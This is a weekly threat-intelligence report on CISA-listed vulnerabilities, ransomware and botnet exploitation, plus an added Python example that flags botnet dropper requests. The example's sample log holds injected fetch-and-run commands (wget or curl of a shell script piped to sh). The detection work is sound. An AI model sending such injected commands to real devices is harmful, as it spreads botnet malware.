A Week of Wild Exploitations and Threats

September 13, 2024
Executive Summary

This week has been very critical, with CISA adding seven new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Among these are four Microsoft-related issues: CVE-2024-38226, CVE-2024-43491, CVE-2024-38014, and CVE-2024-38217. These vulnerabilities, addressed in Microsoft’s latest Patch Tuesday update, pose significant risks if not swiftly patched, underscoring the urgent need for system updates to thwart potential attacks.

In addition, CISA has included two older yet still critical vulnerabilities: CVE-2017-1000253, a serious Linux Kernel flaw, and CVE-2016-3714, an issue with ImageMagick software. The addition of these historic vulnerabilities highlights their ongoing threat, particularly to critical infrastructure that may remain unpatched. This week’s updates emphasize the need for vigilant security practices and comprehensive updates for both current and legacy vulnerabilities across all systems.

The notorious Akira ransomware has been actively exploiting CVE-2024-40766, a critical vulnerability in SonicWall Firewalls, to gain initial access to victims' systems. Similarly, the APT-41 threat actor has been deploying the SideWalk trojan malware, which targets a critical vulnerability in OSGeo GeoServer GeoTools.

The Mirai botnet continues its aggressive exploitation, targeting LB-Link BL devices, TP-Link Archer AX21 routers, and Avtech Security cameras. Notably, variants of Mirai such as Condi and JenX are leveraging a critical vulnerability in OSGeo GeoServer GeoTools. Additionally, the Sysrv and Enemy botnets are exploiting vulnerabilities in Spring Cloud Gateway and Huawei HG532 devices. The IoT_Reaper botnet remains active, persistently exploiting an eight-year-old vulnerability in MVPower CCTV DVR models.

Trending / Critical Vulnerabilities

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping teams make informed decisions.

CVE-2024-38014

A recently disclosed Windows Installer vulnerability, identified as CVE-2024-38014, poses a severe threat by allowing attackers to elevate their privileges to SYSTEM level without requiring user input. With a CVSS score of 7.8 and an EPSS score of 0.00146, this high-severity vulnerability has been added to the CISA KEV catalog.

CVE-2024-38217

A security feature bypass vulnerability in the Windows Mark-of-the-Web (MotW), tracked as CVE-2024-38217, has an EPSS score of 0.00382. Exploitation could bypass the Mark of the Web functionality, enabling unauthorized actions on the user's system. Microsoft describes the impact as a "limited compromise," affecting the integrity and availability of application reputation checks and other security features. This vulnerability has been added to the CISA KEV catalog.

CVE-2024-38226

Recently added to the CISA KEV catalog, a security feature bypass vulnerability in Microsoft Publisher, rated with a low EPSS score of 0.00144, enables attackers to evade Office macro policies. This vulnerability poses a significant risk by allowing the execution of untrusted or malicious files, which could compromise system security.

CVE-2024-43491

Yet another remote code execution vulnerability in Microsoft Windows, identified as CVE-2024-43491, has an EPSS score of 0.00712 and a high CVSS score of 9.8. This critical flaw allows attackers to exploit previously mitigated vulnerabilities in Windows 10, version 1507. The issue involves a rollback of fixes that Microsoft had implemented between March and August for certain versions of Windows 10. This vulnerability has been added to the CISA KEV catalog, highlighting its significant threat to system security.

CVE-2024-45506

A vulnerability in HAProxy, with an EPSS score of 0.00858 and a CVSS score of 7.8, can create an endless loop under certain conditions, potentially causing a system crash and enabling remote denial-of-service (DoS) attacks. This issue arises from a flaw in the HTTP/2 multiplexer, particularly when used with zero-copy forwarding designed to optimize data transfer. In rare cases, attackers can exploit this vulnerability to initiate an infinite loop in the h2_send() function.

CVE-2024-40766

An improper access control vulnerability in SonicWall SonicOS, impacting both management access and SSLVPN, can grant unauthorized access to system resources and, in some cases, cause a firewall crash. With a CVSS score of 9.3 and an EPSS score of 0.01179, this vulnerability poses a serious security risk and has been added to the CISA KEV catalog.

CVE-2017-1000253

A high-severity stack-based buffer overflow vulnerability in the Linux Kernel, rated CVSS 7.8 and EPSS 0.06297, allows local attackers to escalate privileges. Recently included in the CISA KEV catalog and with a publicly available proof of concept (PoC), this vulnerability has been historically exploited by DarkRadiation ransomware and the Libprocesshider rootkit, representing a serious security risk.

CVE-2016-3714

Discovered eight years ago, an improper input validation flaw in ImageMagick allows attackers to run arbitrary code by embedding malicious shell metacharacters in images. The vulnerability, rated with a CVSS score of 8.4 and a high EPSS score of 0.97355, poses a significant security threat and has recently been added to the CISA KEV catalog.

Exploit Activity and Mass Scanning Observed on Cytellite Sensors

Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.

| Vulnerability | Product | Severity | Title | Exploited in the wild | CISA KEV |
|---|---|---|---|---|---|
| CVE-2023-38646 | Metabase open source and Metabase Enterprise | Critical | Remote code execution vulnerability in Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 | True | True |
| CVE-2023-4415 | Ruijie RG-EW1200G 07161417 r483 | High | Improper Authentication vulnerability in Ruijie RG-EW1200G 07161417 r483 | False | False |
| CVE-2023-26801 | LB-LINK | Critical | Command injection vulnerability in LB-LINK devices | True | False |
| CVE-2023-1389 | TP-Link Archer AX-21 | High | Command Injection Vulnerability in TP-Link Archer AX-21 | True | True |
| CVE-2022-34045 | Wavlink Devices | Critical | Hardcoded encryption/decryption key vulnerability in Wavlink | False | False |
| CVE-2022-30489 | Wavlink Devices | Medium | Cross-site scripting vulnerability in Wavlink Devices | False | False |
| CVE-2022-30023 | Tenda Devices | High | Command injection vulnerability via the Ping function in Tenda Products | False | False |
| CVE-2022-25168 | Apache Hadoop | Critical | Command injection vulnerability in org.apache.hadoop.fs.FileUtil.unTarUsingTar in Apache Hadoop | False | False |
| CVE-2022-24847 | GeoServer | High | Improper input validation vulnerability in GeoServer leads to arbitrary code execution | False | False |
| CVE-2022-41040 | Microsoft Exchange Server | High | Server-Side Request Forgery Vulnerability in Microsoft Exchange Server | True | True |
| CVE-2022-22947 | Spring Cloud Gateway | Critical | Remote code execution vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | True |

Vulnerabilities abused by Botnet

Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. Presenting the top 5 CVEs with payloads suggestive of botnet activity, such as the use of wget with raw IP addresses.

| Vulnerability | Product | Title | Exploit | Abused by Botnet |
|---|---|---|---|---|
| CVE-2023-26801 | LB-LINK BL Devices | Command injection vulnerability in LB-LINK BL-AC1900_2.0 1.0.1, BL-WR9000 2.4.9, BL-X26 1.2.5 and BL-LTE300 1.0.8 | True | Mirai |
| CVE-2022-22947 | Spring Cloud Gateway | Remote code execution vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | Enemybot, GuardMiner, Sysrv-botnet |
| CVE-2017-17215 | Huawei HG532 | Remote code execution vulnerability in Huawei HG532 router | True | Sysrv-botnet |
| CVE-2016-20016 | MVPower CCTV DVR models | Remote code execution vulnerability in MVPower CCTV DVR models | True | IoT-Reaper |
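As an added example (not part of the original report or of Loginsoft's sensor tooling), the following Python applies the heuristic described above, a downloader command followed by a bare IPv4 literal, to a few constructed sensor records. The record format, the request paths and the addresses (documentation ranges) are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample sensor records, one request per line:
# "<source_ip> <METHOD> <path, query and/or body>" (URL-encoded as captured).
# 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges, not real hosts.
SAMPLE_LOG = """\
203.0.113.7 POST /cgi-bin/handler cmd=cd+/tmp%3Bwget+http%3A%2F%2F198.51.100.23%2Fbins.sh%3Bsh+bins.sh
203.0.113.9 GET /api/health
203.0.113.12 GET /index.php?page=1
203.0.113.14 GET /status?host=127.0.0.1;curl%20http://198.51.100.40/x%7Csh
203.0.113.21 GET /download?url=https://updates.example.com/latest.tar.gz
"""

DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp)\b", re.IGNORECASE)
IPV4_RE = re.compile(r"\b((?:\d{1,3}\.){3}\d{1,3})\b")


def is_public_ipv4(ip):
    """Reject loopback, private, link-local and 0.x addresses.

    Botnet droppers point at reachable public hosts; a manual check is used
    so that the documentation ranges in the constructed sample count as public.
    """
    octets = [int(o) for o in ip.split(".")]
    if any(o > 255 for o in octets):
        return False
    a, b = octets[0], octets[1]
    return not (a in (0, 10, 127) or (a == 172 and 16 <= b <= 31)
                or (a == 192 and b == 168) or (a == 169 and b == 254))


def classify_request(raw):
    """Return the public IPv4 a downloader command points at, or None."""
    text = unquote_plus(raw)            # payloads arrive URL-encoded
    m = DOWNLOADER_RE.search(text)
    if not m:
        return None
    for ip in IPV4_RE.findall(text[m.end():]):   # only IPs after the command
        if is_public_ipv4(ip):
            return ip
    return None


def scan_log(log):
    """Return (source_ip, stager_ip) pairs for records matching the heuristic."""
    hits = []
    for line in log.splitlines():
        src, _method, request = line.split(" ", 2)
        stager = classify_request(request)
        if stager:
            hits.append((src, stager))
    return hits
```

Flagged records are candidates for payload review, not verdicts: a legitimate admin script that fetches by IP would also match, so the source IP and full payload should still be examined.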

Vulnerabilities Abused by Malware

We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.

CVE-2024-40766

Recent investigations from Arctic Wolf revealed that a critical improper access control vulnerability in SonicWall Firewall is being exploited by Akira ransomware to gain initial access to target systems. Akira ransomware, first identified in early 2023, operates under a Ransomware-as-a-Service (RaaS) model and is linked to threat actors such as GOLD SAHARA, PUNK SPIDER, and Storm-1567. It employs a double extortion tactic, exfiltrating data before encrypting victim systems, and demands Bitcoin payments for decryption or to prevent data leaks.

CVE-2024-36401

An eval injection vulnerability in GeoServer can lead to remote code execution and has been exploited by GOREVERSE malware. In certain cases, attackers have used this flaw to deploy SideWalk malware, a sophisticated backdoor linked to the APT41 threat group. Additionally, the vulnerability has been leveraged to distribute Mirai variants like JenX and the Condi DDoS bot.

| Vulnerability | Severity | Title | Patch | Targeted By Malware | OSS |
|---|---|---|---|---|---|
| CVE-2024-40766 | Critical | Improper Access Control vulnerability in SonicWall SonicOS management access leads to crash | True | Akira Ransomware | False |
| CVE-2024-36401 | Critical | Eval Injection vulnerability in GeoServer leads to remote code execution | True | Mirai Variant - JenX, SideWalk, Condi, Coinminer, GOREVERSE, APT-41 | True |

PRE-NVD

PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

| CVE-ID | Type of Vulnerability | Product | Reference |
|---|---|---|---|
| CVE-2024-8356 | Privilege Escalation | Visteon Infotainment | Resource |
| CVE-2024-5581 | Directory Traversal | Allegra | Resource |
| CVE-2024-26006 | Cross-site Scripting | FortiOS and FortiProxy's web SSL VPN UI | Resource |
| CVE-2024-5580 | Deserialization of Untrusted Data | Allegra | Resource |
| CVE-2024-8357 | Privilege Escalation | Visteon Infotainment | Resource |

External References

1. https://www.cisa.gov/news-events/alerts/2024/09/09/cisa-adds-three-known-exploited-vulnerabilities-catalog
2. https://www.cisa.gov/news-events/alerts/2024/09/10/cisa-adds-four-known-exploited-vulnerabilities-catalog
3. https://www.fortinet.com/blog/threat-research/threat-actors-exploit-geoserver-vulnerability-cve-2024-36401
4. https://arcticwolf.com/resources/blog/arctic-wolf-observes-akira-ransomware-campaign-targeting-sonicwall-sslvpn-accounts/
5. https://msrc.microsoft.com/update-guide/releaseNote/2024-Sep
6. https://socradar.io/akira-ransomware-targets-sonicwall-vulnerability-cve-2024-40766-immediate-patching-required/
